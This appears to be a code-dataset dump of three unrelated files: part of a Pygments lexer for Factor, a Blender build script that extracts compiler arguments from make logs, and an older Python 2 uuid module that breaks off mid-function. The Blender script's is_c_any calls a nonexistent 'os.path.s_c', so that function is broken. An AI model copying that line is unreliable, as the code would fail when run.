'repetition?', 'replace-slice', 'replicate', 'replicate-as', 'rest',
'rest-slice', 'reverse', 'reverse!', 'reversed', 'reversed?', 'second',
'selector', 'selector-for', 'sequence', 'sequence-hashcode', 'sequence=',
'sequence?', 'set-first', 'set-fourth', 'set-last', 'set-length', 'set-nth',
'set-second', 'set-third', 'short', 'shorten', 'shorter', 'shorter?',
'shortest', 'sift', 'slice', 'slice-error', 'slice-error?', 'slice?',
'snip', 'snip-slice', 'start', 'start*', 'subseq', 'subseq?', 'suffix',
'suffix!', 'sum', 'sum-lengths', 'supremum', 'supremum-by', 'surround', 'tail',
'tail-slice', 'tail-slice*', 'tail*', 'tail?', 'third', 'trim',
'trim-head', 'trim-head-slice', 'trim-slice', 'trim-tail', 'trim-tail-slice',
'unclip', 'unclip-last', 'unclip-last-slice', 'unclip-slice', 'unless-empty',
'virtual-exemplar', 'virtual-sequence', 'virtual-sequence?', 'virtual@',
'when-empty'), suffix=r'\s')
builtin_namespaces = words((
'+@', 'change', 'change-global', 'counter', 'dec', 'get', 'get-global',
'global', 'inc', 'init-namespaces', 'initialize', 'is-global', 'make-assoc',
'namespace', 'namestack', 'off', 'on', 'set', 'set-global', 'set-namestack',
'toggle', 'with-global', 'with-scope', 'with-variable', 'with-variables'),
suffix=r'\s')
builtin_arrays = words((
'1array', '2array', '3array', '4array', '<array>', '>array', 'array',
'array?', 'pair', 'pair?', 'resize-array'), suffix=r'\s')
builtin_io = words((
'(each-stream-block-slice)', '(each-stream-block)',
'(stream-contents-by-block)', '(stream-contents-by-element)',
'(stream-contents-by-length-or-block)',
'(stream-contents-by-length)', '+byte+', '+character+',
'bad-seek-type', 'bad-seek-type?', 'bl', 'contents', 'each-block',
'each-block-size', 'each-block-slice', 'each-line', 'each-morsel',
'each-stream-block', 'each-stream-block-slice', 'each-stream-line',
'error-stream', 'flush', 'input-stream', 'input-stream?',
'invalid-read-buffer', 'invalid-read-buffer?', 'lines', 'nl',
'output-stream', 'output-stream?', 'print', 'read', 'read-into',
'read-partial', 'read-partial-into', 'read-until', 'read1', 'readln',
'seek-absolute', 'seek-absolute?', 'seek-end', 'seek-end?',
'seek-input', 'seek-output', 'seek-relative', 'seek-relative?',
'stream-bl', 'stream-contents', 'stream-contents*', 'stream-copy',
'stream-copy*', 'stream-element-type', 'stream-flush',
'stream-length', 'stream-lines', 'stream-nl', 'stream-print',
'stream-read', 'stream-read-into', 'stream-read-partial',
'stream-read-partial-into', 'stream-read-partial-unsafe',
'stream-read-unsafe', 'stream-read-until', 'stream-read1',
'stream-readln', 'stream-seek', 'stream-seekable?', 'stream-tell',
'stream-write', 'stream-write1', 'tell-input', 'tell-output',
'with-error-stream', 'with-error-stream*', 'with-error>output',
'with-input-output+error-streams',
'with-input-output+error-streams*', 'with-input-stream',
'with-input-stream*', 'with-output-stream', 'with-output-stream*',
'with-output>error', 'with-output+error-stream',
'with-output+error-stream*', 'with-streams', 'with-streams*',
'write', 'write1'), suffix=r'\s')
builtin_strings = words((
'1string', '<string>', '>string', 'resize-string', 'string',
'string?'), suffix=r'\s')
builtin_vectors = words((
'1vector', '<vector>', '>vector', '?push', 'vector', 'vector?'),
suffix=r'\s')
builtin_continuations = words((
'<condition>', '<continuation>', '<restart>', 'attempt-all',
'attempt-all-error', 'attempt-all-error?', 'callback-error-hook',
'callcc0', 'callcc1', 'cleanup', 'compute-restarts', 'condition',
'condition?', 'continuation', 'continuation?', 'continue',
'continue-restart', 'continue-with', 'current-continuation',
'error', 'error-continuation', 'error-in-thread', 'error-thread',
'ifcc', 'ignore-errors', 'in-callback?', 'original-error', 'recover',
'restart', 'restart?', 'restarts', 'rethrow', 'rethrow-restarts',
'return', 'return-continuation', 'thread-error-hook', 'throw-continue',
'throw-restarts', 'with-datastack', 'with-return'), suffix=r'\s')
tokens = {
'root': [
# factor allows a file to start with a shebang
(r'#!.*$', Comment.Preproc),
default('base'),
],
'base': [
(r'\s+', Text),
# defining words
(r'((?:MACRO|MEMO|TYPED)?:[:]?)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(M:[:]?)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Function)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(GENERIC:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(HOOK:|GENERIC#)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Function)),
(r'\(\s', Name.Function, 'stackeffect'),
(r';\s', Keyword),
# imports and namespaces
(r'(USING:)(\s+)',
bygroups(Keyword.Namespace, Text), 'vocabs'),
(r'(USE:|UNUSE:|IN:|QUALIFIED:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(QUALIFIED-WITH:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text, Name.Namespace)),
(r'(FROM:|EXCLUDE:)(\s+)(\S+)(\s+=>\s)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text), 'words'),
(r'(RENAME:)(\s+)(\S+)(\s+)(\S+)(\s+=>\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Namespace, Text, Name.Function)),
(r'(ALIAS:|TYPEDEF:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function)),
(r'(DEFER:|FORGET:|POSTPONE:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function)),
# tuples and classes
(r'(TUPLE:|ERROR:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class), 'slots'),
(r'(TUPLE:|ERROR:|BUILTIN:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class), 'slots'),
(r'(MIXIN:|UNION:|INTERSECTION:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class)),
(r'(PREDICATE:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(INSTANCE:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(SLOT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Function)),
(r'(SINGLETON:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'SINGLETONS:', Keyword, 'classes'),
# other syntax
(r'(CONSTANT:|SYMBOL:|MAIN:|HELP:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'SYMBOLS:\s', Keyword, 'words'),
(r'SYNTAX:\s', Keyword),
(r'ALIEN:\s', Keyword),
(r'(STRUCT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'(FUNCTION:)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text)),
(r'(FUNCTION-ALIAS:)(\s+)(\S+)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function, Text)),
# vocab.private
(r'(?:<PRIVATE|PRIVATE>)\s', Keyword.Namespace),
# strings
(r'"""\s+(?:.|\n)*?\s+"""', String),
(r'"(?:\\\\|\\"|[^"])*"', String),
(r'\S+"\s+(?:\\\\|\\"|[^"])*"', String),
(r'CHAR:\s+(?:\\[\\abfnrstv]|[^\\]\S*)\s', String.Char),
# comments
(r'!\s+.*$', Comment),
(r'#!\s+.*$', Comment),
(r'/\*\s+(?:.|\n)*?\s\*/\s', Comment),
# boolean constants
(r'[tf]\s', Name.Constant),
# symbols and literals
(r'[\\$]\s+\S+', Name.Constant),
(r'M\\\s+\S+\s+\S+', Name.Constant),
# numbers
(r'[+-]?(?:[\d,]*\d)?\.(?:\d([\d,]*\d)?)?(?:[eE][+-]?\d+)?\s', Number),
(r'[+-]?\d(?:[\d,]*\d)?(?:[eE][+-]?\d+)?\s', Number),
(r'0x[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'NAN:\s+[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'0b[01]+\s', Number.Bin),
(r'0o[0-7]+\s', Number.Oct),
(r'(?:\d([\d,]*\d)?)?\+\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
(r'(?:\-\d([\d,]*\d)?)?\-\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
# keywords
(r'(?:deprecated|final|foldable|flushable|inline|recursive)\s',
Keyword),
# builtins
(builtin_kernel, Name.Builtin),
(builtin_assocs, Name.Builtin),
(builtin_combinators, Name.Builtin),
(builtin_math, Name.Builtin),
(builtin_sequences, Name.Builtin),
(builtin_namespaces, Name.Builtin),
(builtin_arrays, Name.Builtin),
(builtin_io, Name.Builtin),
(builtin_strings, Name.Builtin),
(builtin_vectors, Name.Builtin),
(builtin_continuations, Name.Builtin),
# everything else is text
(r'\S+', Text),
],
'stackeffect': [
(r'\s+', Text),
(r'\(\s+', Name.Function, 'stackeffect'),
(r'\)\s', Name.Function, '#pop'),
(r'--\s', Name.Function),
(r'\S+', Name.Variable),
],
'slots': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)',
bygroups(Text, Name.Variable, Text)),
(r'\S+', Name.Variable),
],
'vocabs': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Namespace),
],
'classes': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Class),
],
'words': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Function),
],
}
| apache-2.0 |
pawkoz/dyplom | blender/build_files/cmake/project_source_info.py | 2 | 7070 | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Contributor(s): Campbell Barton
#
# ***** END GPL LICENSE BLOCK *****
# <pep8 compliant>
__all__ = (
"build_info",
"SOURCE_DIR",
)
import sys
if not sys.version.startswith("3"):
print("\nPython3.x needed, found %s.\nAborting!\n" %
sys.version.partition(" ")[0])
sys.exit(1)
import os
from os.path import join, dirname, normpath, abspath
SOURCE_DIR = join(dirname(__file__), "..", "..")
SOURCE_DIR = normpath(SOURCE_DIR)
SOURCE_DIR = abspath(SOURCE_DIR)
def is_c_header(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".h", ".hpp", ".hxx", ".hh"})
def is_c(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".c", ".cpp", ".cxx", ".m", ".mm", ".rc", ".cc", ".inl", ".osl"})
def is_c_any(filename):
return os.path.s_c(filename) or is_c_header(filename)
# copied from project_info.py
CMAKE_DIR = "."
def cmake_cache_var_iter():
import re
re_cache = re.compile(r'([A-Za-z0-9_\-]+)?:?([A-Za-z0-9_\-]+)?=(.*)$')
with open(join(CMAKE_DIR, "CMakeCache.txt"), 'r', encoding='utf-8') as cache_file:
for l in cache_file:
match = re_cache.match(l.strip())
if match is not None:
var, type_, val = match.groups()
yield (var, type_ or "", val)
def cmake_cache_var(var):
for var_iter, type_iter, value_iter in cmake_cache_var_iter():
if var == var_iter:
return value_iter
return None
def do_ignore(filepath, ignore_prefix_list):
if ignore_prefix_list is None:
return False
relpath = os.path.relpath(filepath, SOURCE_DIR)
return any([relpath.startswith(prefix) for prefix in ignore_prefix_list])
def makefile_log():
import subprocess
import time
# support both make and ninja
make_exe = cmake_cache_var("CMAKE_MAKE_PROGRAM")
make_exe_basename = os.path.basename(make_exe)
if make_exe_basename.startswith(("make", "gmake")):
print("running 'make' with --dry-run ...")
process = subprocess.Popen([make_exe, "--always-make", "--dry-run", "--keep-going", "VERBOSE=1"],
stdout=subprocess.PIPE,
)
elif make_exe_basename.startswith("ninja"):
print("running 'ninja' with -t commands ...")
process = subprocess.Popen([make_exe, "-t", "commands"],
stdout=subprocess.PIPE,
)
while process.poll():
time.sleep(1)
out = process.stdout.read()
process.stdout.close()
print("done!", len(out), "bytes")
return out.decode("utf-8", errors="ignore").split("\n")
def build_info(use_c=True, use_cxx=True, ignore_prefix_list=None):
makelog = makefile_log()
source = []
compilers = []
if use_c:
compilers.append(cmake_cache_var("CMAKE_C_COMPILER"))
if use_cxx:
compilers.append(cmake_cache_var("CMAKE_CXX_COMPILER"))
print("compilers:", " ".join(compilers))
fake_compiler = "%COMPILER%"
print("parsing make log ...")
for line in makelog:
args = line.split()
if not any([(c in args) for c in compilers]):
continue
# join args incase they are not.
args = ' '.join(args)
args = args.replace(" -isystem", " -I")
args = args.replace(" -D ", " -D")
args = args.replace(" -I ", " -I")
for c in compilers:
args = args.replace(c, fake_compiler)
args = args.split()
# end
# remove compiler
args[:args.index(fake_compiler) + 1] = []
c_files = [f for f in args if is_c(f)]
inc_dirs = [f[2:].strip() for f in args if f.startswith('-I')]
defs = [f[2:].strip() for f in args if f.startswith('-D')]
for c in sorted(c_files):
if do_ignore(c, ignore_prefix_list):
continue
source.append((c, inc_dirs, defs))
# make relative includes absolute
# not totally essential but useful
for i, f in enumerate(inc_dirs):
if not os.path.isabs(f):
inc_dirs[i] = os.path.abspath(os.path.join(CMAKE_DIR, f))
# safety check that our includes are ok
for f in inc_dirs:
if not os.path.exists(f):
raise Exception("%s missing" % f)
print("done!")
return source
def build_defines_as_source():
"""
Returns a string formatted as an include:
'#defines A=B\n#define....'
"""
import subprocess
# works for both gcc and clang
cmd = (cmake_cache_var("CMAKE_C_COMPILER"), "-dM", "-E", "-")
return subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.DEVNULL,
).stdout.read().strip().decode('ascii')
def build_defines_as_args():
return [("-D" + "=".join(l.split(maxsplit=2)[1:]))
for l in build_defines_as_source().split("\n")
if l.startswith('#define')]
# could be moved elsewhere!, this just happens to be used by scripts that also
# use this module.
def queue_processes(process_funcs, job_total=-1):
""" Takes a list of function arg pairs, each function must return a process
"""
if job_total == -1:
import multiprocessing
job_total = multiprocessing.cpu_count()
del multiprocessing
if job_total == 1:
for func, args in process_funcs:
sys.stdout.flush()
sys.stderr.flush()
process = func(*args)
process.wait()
else:
import time
processes = []
for func, args in process_funcs:
# wait until a thread is free
while 1:
processes[:] = [p for p in processes if p.poll() is None]
if len(processes) <= job_total:
break
else:
time.sleep(0.1)
sys.stdout.flush()
sys.stderr.flush()
processes.append(func(*args))
def main():
if not os.path.exists(join(CMAKE_DIR, "CMakeCache.txt")):
print("This script must run from the cmake build dir")
return
for s in build_info():
print(s)
if __name__ == "__main__":
main()
| gpl-2.0 |
openhatch/oh-mainline | vendor/packages/django-extensions/django_extensions/utils/uuid.py | 44 | 20400 | r"""UUID objects (universally unique identifiers) according to RFC 4122.
This module provides immutable UUID objects (class UUID) and the functions
uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5
UUIDs as specified in RFC 4122.
If all you want is a unique ID, you should probably call uuid1() or uuid4().
Note that uuid1() may compromise privacy since it creates a UUID containing
the computer's network address. uuid4() creates a random UUID.
Typical usage:
>>> import uuid
# make a UUID based on the host ID and current time
>>> uuid.uuid1()
UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
# make a UUID using an MD5 hash of a namespace UUID and a name
>>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org')
UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e')
# make a random UUID
>>> uuid.uuid4()
UUID('16fd2706-8baf-433b-82eb-8c7fada847da')
# make a UUID using a SHA-1 hash of a namespace UUID and a name
>>> uuid.uuid5(uuid.NAMESPACE_DNS, 'python.org')
UUID('886313e1-3b8a-5372-9b90-0c9aee199e5d')
# make a UUID from a string of hex digits (braces and hyphens ignored)
>>> x = uuid.UUID('{00010203-0405-0607-0809-0a0b0c0d0e0f}')
# convert a UUID to a string of hex digits in standard form
>>> str(x)
'00010203-0405-0607-0809-0a0b0c0d0e0f'
# get the raw 16 bytes of the UUID
>>> x.bytes
'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f'
# make a UUID from a 16-byte string
>>> uuid.UUID(bytes=x.bytes)
UUID('00010203-0405-0607-0809-0a0b0c0d0e0f')
"""
__author__ = 'Ka-Ping Yee <[email protected]>'
RESERVED_NCS, RFC_4122, RESERVED_MICROSOFT, RESERVED_FUTURE = [
'reserved for NCS compatibility', 'specified in RFC 4122',
'reserved for Microsoft compatibility', 'reserved for future definition'
]
class UUID(object):
"""Instances of the UUID class represent UUIDs as specified in RFC 4122.
UUID objects are immutable, hashable, and usable as dictionary keys.
Converting a UUID to a string with str() yields something in the form
'12345678-1234-1234-1234-123456789abc'. The UUID constructor accepts
five possible forms: a similar string of hexadecimal digits, or a tuple
of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and
48-bit values respectively) as an argument named 'fields', or a string
of 16 bytes (with all the integer fields in big-endian order) as an
argument named 'bytes', or a string of 16 bytes (with the first three
fields in little-endian order) as an argument named 'bytes_le', or a
single 128-bit integer as an argument named 'int'.
UUIDs have these read-only attributes:
bytes the UUID as a 16-byte string (containing the six
integer fields in big-endian byte order)
bytes_le the UUID as a 16-byte string (with time_low, time_mid,
and time_hi_version in little-endian byte order)
fields a tuple of the six integer fields of the UUID,
which are also available as six individual attributes
and two derived attributes:
time_low the first 32 bits of the UUID
time_mid the next 16 bits of the UUID
time_hi_version the next 16 bits of the UUID
clock_seq_hi_variant the next 8 bits of the UUID
clock_seq_low the next 8 bits of the UUID
node the last 48 bits of the UUID
time the 60-bit timestamp
clock_seq the 14-bit sequence number
hex the UUID as a 32-character hexadecimal string
int the UUID as a 128-bit integer
urn the UUID as a URN as specified in RFC 4122
variant the UUID variant (one of the constants RESERVED_NCS,
RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)
version the UUID version number (1 through 5, meaningful only
when the variant is RFC_4122)
"""
def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None,
int=None, version=None):
r"""Create a UUID from either a string of 32 hexadecimal digits,
a string of 16 bytes as the 'bytes' argument, a string of 16 bytes
in little-endian order as the 'bytes_le' argument, a tuple of six
integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,
8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as
the 'fields' argument, or a single 128-bit integer as the 'int'
argument. When a string of hex digits is given, curly braces,
hyphens, and a URN prefix are all optional. For example, these
expressions all yield the same UUID:
UUID('{12345678-1234-5678-1234-567812345678}')
UUID('12345678123456781234567812345678')
UUID('urn:uuid:12345678-1234-5678-1234-567812345678')
UUID(bytes='\x12\x34\x56\x78'*4)
UUID(bytes_le='\x78\x56\x34\x12\x34\x12\x78\x56' +
'\x12\x34\x56\x78\x12\x34\x56\x78')
UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))
UUID(int=0x12345678123456781234567812345678)
Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must
be given. The 'version' argument is optional; if given, the resulting
UUID will have its variant and version set according to RFC 4122,
overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.
"""
if [hex, bytes, bytes_le, fields, int].count(None) != 4:
raise TypeError('need one of hex, bytes, bytes_le, fields, or int')
if hex is not None:
hex = hex.replace('urn:', '').replace('uuid:', '')
hex = hex.strip('{}').replace('-', '')
if len(hex) != 32:
raise ValueError('badly formed hexadecimal UUID string')
int = long(hex, 16)
if bytes_le is not None:
if len(bytes_le) != 16:
raise ValueError('bytes_le is not a 16-char string')
bytes = (bytes_le[3] + bytes_le[2] + bytes_le[1] + bytes_le[0] +
bytes_le[5] + bytes_le[4] + bytes_le[7] + bytes_le[6] +
bytes_le[8:])
if bytes is not None:
if len(bytes) != 16:
raise ValueError('bytes is not a 16-char string')
int = long(('%02x' * 16) % tuple(map(ord, bytes)), 16)
if fields is not None:
if len(fields) != 6:
raise ValueError('fields is not a 6-tuple')
(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node) = fields
if not 0 <= time_low < 1 << 32L:
raise ValueError('field 1 out of range (need a 32-bit value)')
if not 0 <= time_mid < 1 << 16L:
raise ValueError('field 2 out of range (need a 16-bit value)')
if not 0 <= time_hi_version < 1 << 16L:
raise ValueError('field 3 out of range (need a 16-bit value)')
if not 0 <= clock_seq_hi_variant < 1 << 8L:
raise ValueError('field 4 out of range (need an 8-bit value)')
if not 0 <= clock_seq_low < 1 << 8L:
raise ValueError('field 5 out of range (need an 8-bit value)')
if not 0 <= node < 1 << 48L:
raise ValueError('field 6 out of range (need a 48-bit value)')
clock_seq = (clock_seq_hi_variant << 8L) | clock_seq_low
int = ((time_low << 96L) | (time_mid << 80L) |
(time_hi_version << 64L) | (clock_seq << 48L) | node)
if int is not None:
if not 0 <= int < 1 << 128L:
raise ValueError('int is out of range (need a 128-bit value)')
if version is not None:
if not 1 <= version <= 5:
raise ValueError('illegal version number')
# Set the variant to RFC 4122.
int &= ~(0xc000 << 48L)
int |= 0x8000 << 48L
# Set the version number.
int &= ~(0xf000 << 64L)
int |= version << 76L
self.__dict__['int'] = int
def __cmp__(self, other):
if isinstance(other, UUID):
return cmp(self.int, other.int)
return NotImplemented
def __hash__(self):
return hash(self.int)
def __int__(self):
return self.int
def __repr__(self):
return 'UUID(%r)' % str(self)
def __setattr__(self, name, value):
raise TypeError('UUID objects are immutable')
def __str__(self):
hex = '%032x' % self.int
return '%s-%s-%s-%s-%s' % (
hex[:8], hex[8:12], hex[12:16], hex[16:20], hex[20:])
def get_bytes(self):
bytes = ''
for shift in range(0, 128, 8):
bytes = chr((self.int >> shift) & 0xff) + bytes
return bytes
bytes = property(get_bytes)
def get_bytes_le(self):
bytes = self.bytes
return (bytes[3] + bytes[2] + bytes[1] + bytes[0] +
bytes[5] + bytes[4] + bytes[7] + bytes[6] + bytes[8:])
bytes_le = property(get_bytes_le)
def get_fields(self):
return (self.time_low, self.time_mid, self.time_hi_version,
self.clock_seq_hi_variant, self.clock_seq_low, self.node)
fields = property(get_fields)
def get_time_low(self):
return self.int >> 96L
time_low = property(get_time_low)
def get_time_mid(self):
return (self.int >> 80L) & 0xffff
time_mid = property(get_time_mid)
def get_time_hi_version(self):
return (self.int >> 64L) & 0xffff
time_hi_version = property(get_time_hi_version)
def get_clock_seq_hi_variant(self):
return (self.int >> 56L) & 0xff
clock_seq_hi_variant = property(get_clock_seq_hi_variant)
def get_clock_seq_low(self):
return (self.int >> 48L) & 0xff
clock_seq_low = property(get_clock_seq_low)
def get_time(self):
return (((self.time_hi_version & 0x0fffL) << 48L) |
(self.time_mid << 32L) | self.time_low)
time = property(get_time)
def get_clock_seq(self):
return (((self.clock_seq_hi_variant & 0x3fL) << 8L) |
self.clock_seq_low)
clock_seq = property(get_clock_seq)
def get_node(self):
return self.int & 0xffffffffffff
node = property(get_node)
def get_hex(self):
return '%032x' % self.int
hex = property(get_hex)
def get_urn(self):
return 'urn:uuid:' + str(self)
urn = property(get_urn)
def get_variant(self):
if not self.int & (0x8000 << 48L):
return RESERVED_NCS
elif not self.int & (0x4000 << 48L):
return RFC_4122
elif not self.int & (0x2000 << 48L):
return RESERVED_MICROSOFT
else:
return RESERVED_FUTURE
variant = property(get_variant)
def get_version(self):
# The version bits are only meaningful for RFC 4122 UUIDs.
if self.variant == RFC_4122:
return int((self.int >> 76L) & 0xf)
version = property(get_version)
def _find_mac(command, args, hw_identifiers, get_index):
import os
for dir in ['', '/sbin/', '/usr/sbin']:
executable = os.path.join(dir, command)
if not os.path.exists(executable):
continue
try:
# LC_ALL to get English output, 2>/dev/null to
# prevent output on stderr
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
pipe = os.popen(cmd)
except IOError:
continue
for line in pipe:
words = line.lower().split()
for i in range(len(words)):
if words[i] in hw_identifiers:
return int(words[get_index(i)].replace(':', ''), 16)
return None
def _ifconfig_getnode():
"""Get the hardware address on Unix by running ifconfig."""
# This works on Linux ('' or '-a'), Tru64 ('-av'), but not all Unixes.
for args in ('', '-a', '-av'):
mac = _find_mac('ifconfig', args, ['hwaddr', 'ether'], lambda i: i + 1)
if mac:
return mac
import socket
ip_addr = socket.gethostbyname(socket.gethostname())
# Try getting the MAC addr from arp based on our IP address (Solaris).
mac = _find_mac('arp', '-an', [ip_addr], lambda i: -1)
if mac:
return mac
# This might work on HP-UX.
mac = _find_mac('lanscan', '-ai', ['lan0'], lambda i: 0)
if mac:
return mac
return None
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os
import re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
for line in pipe:
value = line.split(':')[-1].strip().lower()
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _netbios_getnode():
"""Get the hardware address on Windows using NetBIOS calls.
See http://support.microsoft.com/kb/118623 for details."""
import win32wnet
import netbios
ncb = netbios.NCB()
ncb.Command = netbios.NCBENUM
ncb.Buffer = adapters = netbios.LANA_ENUM()
adapters._pack()
if win32wnet.Netbios(ncb) != 0:
return
adapters._unpack()
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = map(ord, status.adapter_address)
return ((bytes[0] << 40L) + (bytes[1] << 32L) + (bytes[2] << 24L) +
(bytes[3] << 16L) + (bytes[4] << 8L) + bytes[5])
# Thanks to Thomas Heller for ctypes and for his help with its use here.
# If ctypes is available, use it to find system routines for UUID generation.
_uuid_generate_random = _uuid_generate_time = _UuidCreate = None
try:
import ctypes
import ctypes.util
_buffer = ctypes.create_string_buffer(16)
# The uuid_generate_* routines are provided by libuuid on at least
# Linux and FreeBSD, and provided by libc on Mac OS X.
for libname in ['uuid', 'c']:
try:
lib = ctypes.CDLL(ctypes.util.find_library(libname))
except:
continue
if hasattr(lib, 'uuid_generate_random'):
_uuid_generate_random = lib.uuid_generate_random
if hasattr(lib, 'uuid_generate_time'):
_uuid_generate_time = lib.uuid_generate_time
# On Windows prior to 2000, UuidCreate gives a UUID containing the
# hardware address. On Windows 2000 and later, UuidCreate makes a
# random UUID and UuidCreateSequential gives a UUID containing the
# hardware address. These routines are provided by the RPC runtime.
# NOTE: at least on Tim's WinXP Pro SP2 desktop box, while the last
# 6 bytes returned by UuidCreateSequential are fixed, they don't appear
# to bear any relationship to the MAC address of any network device
# on the box.
try:
lib = ctypes.windll.rpcrt4
except:
lib = None
_UuidCreate = getattr(lib, 'UuidCreateSequential',
getattr(lib, 'UuidCreate', None))
except:
pass
def _unixdll_getnode():
"""Get the hardware address on Unix using ctypes."""
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw).node
def _windll_getnode():
"""Get the hardware address on Windows using ctypes."""
if _UuidCreate(_buffer) == 0:
return UUID(bytes=_buffer.raw).node
def _random_getnode():
"""Get a random node ID, with eighth bit set as suggested by RFC 4122."""
import random
return random.randrange(0, 1 << 48L) | 0x010000000000L
_node = None
def getnode():
"""Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
"""
global _node
if _node is not None:
return _node
import sys
if sys.platform == 'win32':
getters = [_windll_getnode, _netbios_getnode, _ipconfig_getnode]
else:
getters = [_unixdll_getnode, _ifconfig_getnode]
for getter in getters + [_random_getnode]:
try:
_node = getter()
except:
continue
if _node is not None:
return _node
_last_timestamp = None
def uuid1(node=None, clock_seq=None):
"""Generate a UUID from a host ID, sequence number, and the current time.
If 'node' is not given, getnode() is used to obtain the hardware
address. If 'clock_seq' is given, it is used as the sequence number;
otherwise a random 14-bit sequence number is chosen."""
# When the system provides a version-1 UUID generator, use it (but don't
# use UuidCreate here because its UUIDs don't conform to RFC 4122).
if _uuid_generate_time and node is clock_seq is None:
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw)
global _last_timestamp
import time
nanoseconds = int(time.time() * 1e9)
# 0x01b21dd213814000 is the number of 100-ns intervals between the
# UUID epoch 1582-10-15 00:00:00 and the Unix epoch 1970-01-01 00:00:00.
timestamp = int(nanoseconds / 100) + 0x01b21dd213814000L
if timestamp <= _last_timestamp:
timestamp = _last_timestamp + 1
